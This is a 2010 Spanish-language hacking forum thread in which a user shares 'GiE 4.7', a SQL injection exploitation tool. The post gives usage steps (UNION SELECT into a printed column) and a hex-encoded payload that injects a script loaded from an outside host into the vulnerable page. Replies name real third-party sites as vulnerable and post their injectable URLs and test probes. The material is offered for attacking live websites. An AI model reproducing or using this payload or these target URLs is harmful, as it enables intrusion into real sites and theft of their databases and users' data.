GiE 4.7 - MySQLi

Iniciado por Pony-Magic, 16 Marzo 2010, 19:02 PM

0 Miembros y 1 Visitante están viendo este tema.

Pony-Magic

GiE 4.7

No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc.
Simplemente voy a dejar el link de la VERSION 3.0 para el que quiera saber "que es".
De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi.

  • Screens:



    explorador de bases de datos.


    lector de archivos, con Bruteforce.


    consola de peticiones, en la imagen un ejemplo
    de una query que busca mails en la base de datos.



    variables del servidor



    Historial de Inyecciones, para el que quiera
    saber un poco mas sobre el funcionamiento de la GIE





  • Ejemplos:

    SQLi GIE [adegasgalegas.es]
    SQLi GIE [rubias19.com]
    SQLi GIE [comic-ar.com]



  • Usarlo en cualqueir SQLi:

    En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
    En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

    (0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)







tragantras

como ya dije en DDR cada dia te superas^^

(aqui no se pueden dar puntos que si no... xD )
Colaboraciones:
1 2

alexkof158

#2
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D
"noproxy"

Shell Root

Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

tragantras

Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D

http://www.rubias19.com/elnoticiario/videos/index.php?id='



POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD
Colaboraciones:
1 2

alexkof158

Cita de: tragantras en 17 Marzo 2010, 00:16 AM
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D

http://www.rubias19.com/elnoticiario/videos/index.php?id='



POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD

aclare http://comic-ar.com/entrada.php?Id=

saludos
"noproxy"

alexkof158

Cita de: Alex@ShellRoot en 17 Marzo 2010, 00:04 AM
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
joder, obviamente que si se 1 and 1=1-- or 1 and 1=0-- o comillas simples y que tire error sql o algo asi ...  pero con comic.ar ninguna de estas funciona...ahora si entiendennn o me explico federicooo
"noproxy"

Pony-Magic

1) Disfumine por si Murder se quejaba, asi solamente quitaba las SQLi. ( Murder: el admin de diosdelared )
2) http://comic-ar.com/entrada.php?Id=86'
3) Agradeceria que comenten algo sobre el post en vez de discutir como diferenciar un modulo vulnerable a SQLi.

WHK

hola, está super bueno, me gustó.

laideker

Buenisimo... Felicitaciones  ;-) ;-) ;-) ;-)